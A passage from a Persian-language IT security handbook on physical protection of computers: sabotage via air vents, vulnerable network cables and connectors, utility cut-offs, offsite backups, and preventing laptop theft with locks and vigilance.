ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻫﺪﺍﻑ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺗﺨﺮﻳﺐ ﻫﺴﺘﻨﺪ .ﺩﻻﻳﻞ ﺗﺨﺮﻳﺐ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﺍﻧﺘﻘﺎﻡ ،ﺁﺷﻮﺑﻬﺎ ،ﺍﻋﺘﺼﺎﺑﺎﺕ ،ﺑﻴﺎﻧﻴﻪﻫﺎﻱ ﺳﻴﺎﺳﻲ
ﻻ ﻫﺮ ﺑﺨﺶ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ -ﻳﺎ ﺳﺎﺧﺘﻤﺎﻧﻲ ﻛﻪ ﺁﻧﺮﺍ ﺩﺭ ﺧﻮﺩ ﺟﺎ ﺩﺍﺩﻩ ﺍﺳﺖ
ﻭ ﻓﻜﺮﻱ ،ﻭ ﻳﺎ ﺗﻨﻬﺎ ﺳﺮﮔﺮﻣﻲ ﺑﺮﺍﻱ ﻧﺎﺑﺨﺮﺩﺍﻥ ﺑﺎﺷﺪ .ﺍﺻﻮ ﹰ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﺗﺨﺮﻳﺐ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ .ﺩﺭ ﻋﻤﻞ ﺑﻌﻀﻲ ﺍﺯ ﺍﻫﺪﺍﻑ ﺑﻴﺶ ﺍﺯ ﺳﺎﻳﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ.ﻣﻨﺎﻓﺬ ﺗﻬﻮﻳﺔ ﻫﻮﺍ
ﺳﺎﻟﻬﺎ ﻗﺒﻞ ۶۰ ،ﺍﻳﺴﺘﮕﺎﻩﻛﺎﺭﻱ ﺩﺭ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳﺖ )ﺩﺍﻧﺸﮕﺎﻩ ٥٧(MITﺩﺭ ﺗﻨﻬﺎ ﻳﻚ ﺑﻌﺪﺍﺯﻇﻬﺮ ﺗﻮﺳﻂ ﻳﻚ ﺩﺍﻧﺸﺠﻮ ﻛـﻪ ﻧﻮﺷـﺎﺑﻪ-
ﺍﺵ ﺭﺍ ﺩﺍﺧﻞ ﺳﻮﺭﺍﺧﻬﺎﻱ ﺗﻬﻮﻳﻪ ﻫﻮﺍﻱ ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺭﻳﺨﺖ ﺧﺮﺍﺏ ﺷﺪﻧﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺍﺭﺍﻱ ﺷﻜﺎﻓﻬﺎﻱ ﺗﻬﻮﻳﺔ ﻫﻮﺍ ﻫﺴﺘﻨﺪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺣﺘﻴﺎﺝ ﺩﺍﺭﻧﺪ .ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻨﮕﻮﻧﻪ ﺗﺨﺮﻳﺒﻬﺎ ﻧﻤﻲﺗـﻮﺍﻥ ﺍﻳـﻦ ﺷـﻜﺎﻓﻬﺎ ﺭﺍ
ﻣﺴﺪﻭﺩ ﻛﺮﺩ ،ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺁﻭﺭﺩﻥ ﻏﺬﺍ ﻭ ﻧﻮﺷﻴﺪﻧﻲ ﺑﻪ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺍﻛﻴﺪﹰﺍ ﻣﻤﻨﻮﻉ ﻧﻤﻮﺩ ،ﻳﺎ ﺣﻔﺎﻇـﺖ ۲۴ﺳـﺎﻋﺘﻪ ﺭﺍ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ ﻣـﺄﻣﻮﺭ ﻳـﺎ
ﺗﻠﻮﻳﺰﻳﻮﻥ ﻣﺪﺍﺭ ﺑﺴﺘﻪ ﺍﻧﺠﺎﻡ ﺩﺍﺩ.
Massachusetts Institute of Technology
57
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٢٨٥
ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺷﺨﺺ ﺗﺨﺮﻳﺒﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻛﻞ ﺯﻳﺮﺷﺒﻜﺔ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺭﺍ ﺑﺎ ﻗﻄﻊ ﺗﻨﻬﺎ ﻳﻚ ﺳﻴﻢ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳـﻴﻢﭼـﻴﻦ
ﺍﺯ ﻛﺎﺭ ﺑﻴﻨﺪﺍﺯﺩ .ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ Ethernetﺁﺳﻴﺐﭘﺬﻳﺮﺗﺮ ﻫﺴﺘﻨﺪ )ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ( ،ﻣﺸﻜﻠﺘﺮ ﺗﺮﻣﻴﻢ ﻣـﻲﺷـﻮﻧﺪ
)ﺳﺨﺖ ﺑﻪ ﻫﻢ ﭘﻴﻮﻧﺪ ﻣﻲﺧﻮﺭﻧﺪ( ،ﻭ ﺍﻫﺪﺍﻑ ﺟﺬﺍﺑﺘﺮﻱ ﻫﺴﺘﻨﺪ )ﻣﻌﻤﻮ ﹰﻻ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮﻱ ﺗﺒﺎﺩﻝ ﻣﻲﻛﻨﻨﺪ(.
ﻻ ﺍﺯ ﻛﺎﺑﻞﻛﺸﻲﻫﺎﻱ "ﻣﻮﻗﺖ" ﺩﺭ ﺗﺄﺳﻴﺴﺎﺕ ،ﺑﺼﻮﺭﺕ ﺩﺍﺋﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؛ ﭘﺲ ﻭﻗﺖ ﻭ ﺗﻼﺵ ﺑﻴﺸﺘﺮﻱ ﺻﺮﻑ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﻫﻤﺎﻥ
ﻣﻌﻤﻮ ﹰ
ﺍﺑﺘﺪﺍ ﻛﺎﺑﻞ ﺭﺍ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﻧﺼﺐ ﻧﻤﺎﻳﻴﺪ .ﻳﻚ ﺭﻭﺵ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻳﻚ ﻛﺎﺑﻞ ﺷﺒﻜﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻧﺮﺍ ﺍﺯ ﻣﺤﻠﻬﺎﻱ ﻭﺍﺟـﺪ ﺍﻣﻨﻴـﺖ
ﻓﻴﺰﻳﻜﻲ ﻋﺒﻮﺭ ﺩﻫﻴﻢ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ Ethernetﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻣﻴﺎﻥ ﻣﺠﺎﺭﻱ ﻓﻮﻻﺩﻱ ﻋﺒﻮﺭ ﺩﺍﺩﻩ ﺷﻮﺩ .ﺍﻳﻦ ﺷﻴﻮﻩ ﻋﻼﻭﻩ ﺑﺮ ﺣﻔﺎﻇـﺖ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﺗﺨﺮﻳﺐ ،ﺩﺭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺑﻌﻀﻲ ﺍﻧﻮﺍﻉ ﺍﺳﺘﺮﺍﻕﺳﻤﻊﻫﺎﻱ ﺷﺒﻜﻪﺍﻱ ﻧﻴﺰ ﻛﺎﺭﺳﺎﺯ ﺍﺳﺖ ،ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺑﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺩﺭﺻـﻮﺭﺕ ﻭﻗـﻮﻉ ﻳـﻚ
ﺁﺗﺶﺳﻮﺯﻱ ﻛﻮﭼﻚ ﻫﻢ ﺣﻔﻆ ﻛﻨﺪ .ﺍﮔﺮ ﻛﺴﻲ ﺭﻭﻱ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﭘﺎ ﺑﮕﺬﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﻬﺎ ﺷﻜﺴﺘﮕﻲﻫﺎﻱ ﻛﻮﭼﻚ ﺭﺥ ﺩﻫـﺪ.
ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳﻚ ﺷﻜﺴﺘﮕﻲ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﻣﺸﻜﻞ ﺍﺳﺖ ،ﭼﻮﻥ ﺍﺛﺮﻱ ﺍﺯ ﺁﻥ ﺩﺭ ﺭﻭﻛﺶ ﻛﺎﺑﻞ ﺩﻳﺪﻩ ﻧﻤﻲﺷﻮﺩ.
ﺑﺮﺧﻲ ﺍﺯ ﺗﺄﺳﻴﺴﺎﺕ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﺍﺯ ﻛﺎﻧﺎﻟﻬﺎﻱ ﺩﻭ ﺟﺪﺍﺭﺓ ﺣﻔﺎﻅﺩﺍﺭ ﻛﻪ ﺩﺭ ﻣﻴﺎﻥ ﻻﻳﻪﻫﺎﻱ ﺁﻥ ﮔﺎ ﹺﺯ ﻓﺸﺮﺩﻩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ .ﺍﮔـﺮ
ﻓﺸﺎﺭ ﺩﺭﻭﻥ ﺟﺪﺍﺭﻩﻫﺎ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻳﺪ ﻓﺸﺎﺭﻳﺎﺏﻫﺎﻱ ﻛﺎﻧﺎﻝ ﺗﺮﺍﻓﻴﻚ ﮔﺬﺭﻧﺪﻩ ﺍﺯ ﺧﻄﻮﻁ ﺭﺍ ﻣﺘﻮﻗﻒ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺯﻧﮓ ﺧﻄﺮ ﺭﺍ ﺑﻪ ﺻﺪﺍ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ.
ﻼ ﺷﺨﺼﻲ ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﻛﺎﻧﺎﻝ ﻣﻨﻔﺬ ﺍﻳﺠﺎﺩ ﻛﻨﺪ.
ﺍﻳﻨﺤﺎﻟﺖ ﻭﻗﺘﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻣﺜ ﹰ
ﺍﺗﺼﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﺷﺒﻜﻪ
ﻋﻼﻭﻩ ﺑﺮ ﺑﺮﻳﺪﻥ ﻳﻚ ﻛﺎﺑﻞ ،ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﻪ ﻳﻚ ﭘﺎﻳﺎﻧﺔ ﺷﺒﻜﻪ -ﻳﺎ ﻳﻚ ﺍﺗﺼﺎﻝﺩﻫﻨﺪﺓ ﺷﺒﻜﻪ -ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻕ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ
ﻛﺎﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ ﻳﺎ ﺷﺒﻜﻪ ﺭﺍ ﺩﭼﺎﺭ ﺁﺳﻴﺐ ﻛﻨﺪ .ﻫﻤﺔ ﺷﺒﻜﻪﻫﺎﻱ ﻛﺎﺑﻠﻲ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻼﺕ ﻭﻟﺘﺎﮊ ﻗﻮﻱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ.
ﺍﺗﺼﺎﻻﺕ ﻭﺳﺎﻳﻞ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﻗﻄﻊ ﻛﺮﺩﻥ ﺑﺮﻕ ،ﮔﺎﺯ ﻭ ﺁﺏ -ﮔﺎﻫﻲ ﺣﺘﻲ ﺍﺯ ﺧﺎﺭﺝ ﺳﺎﺧﺘﻤﺎﻥ -ﺑﺮﺍﺣﺘﻲ ﻣﻴﺴﺮ ﺍﺳﺖ .ﭼـﻮﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺎﺯ ﺑـﻪ
ﺍﻧﺮﮊﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺩﺍﺭﻧﺪ ،ﻭ ﭼﻮﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﮔﺮﻣﻜﻦﻫﺎﻱ ﮔﺎﺯﻱ ﻳﺎ ﺳﺮﺩﻛﻦﻫﺎﻱ ﺁﺑﻲ ﻭﺍﺑﺴﺘﻪ ﺑﺎﺷﻨﺪ ،ﺍﻳـﻦ ﺍﻣـﺮ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺗﺨﺮﻳﺒﮕﺮ ﻧﻘﺎﻁ ﺍﻧﺠﺎﻡ ﺣﻤﻠﺔ ﺟﺪﻳﺪ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ.
ﺩﻓﺎﻉ ﺩﺭ ﻣﻘﺎﺑﻞ ﻋﻤﻠﻴﺎﺕ ﺟﻨﮕﻲ ﻭ ﺗﺮﻭﺭﻳﺴﺘﻲ
ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ -ﺧﺼﻮﺻﹰﺎ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ -ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺗﺠﺮﺑﺔ ﺁﺯﺍﺭﺩﻫﻨﺪﻩ ﺑﺎﺷﺪ ،ﺍﻣـﺎ ﺍﮔـﺮ ﺭﺍﻳﺎﻧـﻪ ﺣـﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ ﻏﻴﺮﻗﺎﺑـﻞ
ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﺎ ﻓﻮﻕﺍﻟﻌﺎﺩﻩ ﺣﺴﺎﺱ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻗﺮﺑﺎﻧﻲ ﮔﺮﺍﻥ ﺗﻤﺎﻡ ﺷﻮﺩ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﺑﻪ ﺳﺮﻗﺖ ﻣﻲﺭﻭﻧﺪ -ﻳﺎ ﺑﺼﻮﺭﺕ ﺳﻴـﺴﺘﻢ ﻛﺎﻣـﻞ ﻭ ﻳـﺎ ﺍﮔـﺮ ﺳـﺎﺭﻗﺎﻥ ﺧﺒـﺮﻩ ﺑﺎﺷـﻨﺪ
ﺑﺼﻮﺭﺕ ﻗﻄﻌﺎﺕ ﻣﺠﺰﺍ ،ﻛﻪ ﺭﺩﻳﺎﺑﻲ ﻛﺮﺩﻧﺸﺎﻥ ﻣﺸﻜﻠﺘﺮ ﺍﺳﺖ .ﺑﻌﻀﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻮﺳﻂ ﻛﺴﺎﻧﻲ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ
ﻻ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﺁﻥ
ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺗﻬﻴﻪ ﻛﻨﻨﺪ .ﺑﻌﻀﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻫﻢ ﺑﻪ ﺧﺎﻃﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﭼﻮﻥ ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺣﻤﻼﺕ ﻏﻴﺮﻣﻤﻜﻦ ﺍﺳﺖ ،ﺳﻴﺴﺘﻤﻲ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻓﻮﺭﻱ ﻭ ﺩﻳﺴﻜﻬﺎ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﻧﻌﮑﺎﺳـﻲ
ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺑﺎ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺒﻜﺔ ﻧﺴﺒﺘﹰﺎ ﺳﺮﻳﻊ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺮﺗﻴﺒﻲ ﺩﻫﻴﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﻛـﺎﻣﭙﻴﻮﺗﺮ ﻫﻤﺰﻣـﺎﻥ
ﺭﻭﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﻭﺍﻗﻊ ﺩﺭ ﺳﻮﻱ ﺩﻳﮕﺮ ﺷﻬﺮ ﻳﺎ ﺁﻧﺴﻮﻱ ﺟﻬﺎﻥ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺷﻮﻧﺪ .ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻫﻤﺰﻣـﺎﻥ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ dumpﻫﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺳﺎﻋﺘﻲ ﻳﺎ ﺷﺒﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮﭼﻪ ﻳﻚ ﺑﻤﺒﮕﺬﺍﺭﻱ ﺍﻧﺘﺤﺎﺭﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﻛﺰ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﺷﻤﺎ ﺭﺍ ﻧﺎﺑﻮﺩ ﻛﻨﺪ ،ﺍﻣﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺟﺎﻱ ﺩﻳﮕﺮ ﻭ ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺧﺎﻃﺮ ﺣﻔﺎﻇﺖ ﻧﻤﻮﺩ.
٢٨٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻭ ﺍﻟﺒﺘﻪ ﮔﺎﻫﻲ ﻫﻢ ﺗﻮﺳﻂ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺻﺎﺣﺐ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ ﻛـﺎﺭﺑﺮﺩ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺤـﺮﻭﻡ ﻛﻨﻨـﺪ ﺑـﻪ
ﺳﺮﻗﺖ ﻣﻲﺭﻭﻧﺪ .ﻣﻬﻢ ﻧﻴﺴﺖ ﻛﻪ ﭼﺮﺍ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷﻮﺩ؛ ﻏﺎﻟﺐ ﺳﺮﻗﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﻚ ﻋﻨﺼﺮ ﻣﺸﺘﺮﻙ ﺩﺍﺭﻧﺪ :ﻓﺮﺻﺖ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ
ﺍﺯ ﻣﻮﺍﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺑﺪﻭﻥ ﻣﺤﺎﻓﻈﺖ ﺭﻫﺎ ﺷﺪﻩ ﺑﻮﺩﻧﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﻣﺨﺎﻃﺮﺍﺕ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧﺪ .ﺁﻧﻬﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺳﺮﻗﺖ ﻣـﻲﺭﻭﻧـﺪ ،ﻣﺤﻜـﻢ
ﺑﺴﺘﻦ ﺁﻧﻬﺎ ﺑﻪ ﺟﺎﻳﻲ ﻣﺸﻜﻞ ﺍﺳﺖ )ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺩﻳﮕﺮ ﺳﻴﺎﺭ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ!( ،ﻭ ﺑﻪ ﺳﺎﺩﮔﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﻣﻲﺭﺳﻨﺪ .ﻛﺴﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ
ﻛﻴﻔﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻨﺪ .ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﻛﻪ ﺳﺮﻗﺖ ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫـﺎ
ﺑﺨﺼﻮﺹ ﺩﺭ ﻓﺮﻭﺩﮔﺎﻫﻬﺎ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻳﻚ ﻣﻌﻀﻞ ﺍﺳﺎﺳﻲ ﺍﺳﺖ .ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﺒﺎﻳﺪ ﺩﺭ ﻫﻴﭻ ﻛﺠﺎ ﻭ ﺑﺮﺍﻱ ﻫﻴﭻ ﻣﺪﺗﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ
ﺭﻫﺎ ﺷﻮﻧﺪ .ﺍﮔﺮ ﺷﻤﺎ ﺑﺎ ﺗﺎﻛﺴﻲ ﻣﺴﺎﻓﺮﺕ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺻﻨﺪﻭﻕﻋﻘﺐ ﻣﺎﺷﻴﻦ ،ﻧﺰﺩ ﺧﻮﺩﺗﺎﻥ ﻧﮕﻬﺪﺍﺭﻳﺪ.
ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺑﺎ ﺍﻧﺠﺎﻡ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﺳﺎﺩﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺧﻄﺮ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔـﻲ ﻳـﺎ ﺭﻭﻣﻴـﺰﻱ ﺭﺍ ﺑـﻪ ﻣﻴـﺰﺍﻥ ﺯﻳـﺎﺩﻱ
ﻛﺎﻫﺶ ﺩﻫﻴﺪ.
ﻗﻔﻠﻬﺎ
ﻳﻜﻲ ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﺧﻮﺏ ﺣﻔﺎﻇﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺳﺮﻗﺖ ،ﺍﻳﻤﻦﺳﺎﺯﻱ ﻓﻴﺰﻳﻜﻲ ﺁﻥ ﺍﺳﺖ .ﺍﺗﺼﺎﻝﺩﻫﻨﺪﻩﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺑﺴﺘﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﺑﻪ ﻣﻴﺰﻫﺎ ﻭ ﻛﺎﺑﻴﻨﺖﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺍﮔﺮﭼﻪ ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺳﺮﻗﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﻭﻗﻮﻉ ﺁﻧﺮﺍ ﺩﺷﻮﺍﺭﺗﺮ ﻣﻲﺳﺎﺯﻧﺪ.
ﻗﺎﺑﻠﻴﺖ ﺣﻤﻞ ﺁﺳﺎﻥ ﻳﻚ ﻋﺎﻣﻞ ﻣﻬﻢ ﻓﺮﻭﺵ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﺻﻠﻲﺗﺮﻳﻦ ﺩﻟﻴﻞ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺁﻧﻬﺎ ﺍﺳـﺖ .ﻳﻜـﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ
ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﺣﺘﻤﺎﻝ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺣﺪﺍﻗﻞ ﺑﻄﻮﺭ ﻣﻮﻗﺖ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰ ،ﻳﻚ ﻟﻮﻟﻪ ﻳـﺎ ﻳـﻚ ﺷـﻲﺀ ﺑـﺰﺭﮒ
ﺩﻳﮕﺮ ﻗﻔﻞ ﻛﻨﻴﺪ.
ﺑﻴﺸﺘﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ ﻣﺠﻬﺰ ﺑﻪ ﻳﻚ ﺷﻴﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ .ﺑﺎ ﻗﻴﻤﺖ ﻛﻤﺘﺮ ﺍﺯ ۵۰ﺩﻻﺭ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﻗﻔـﻞ
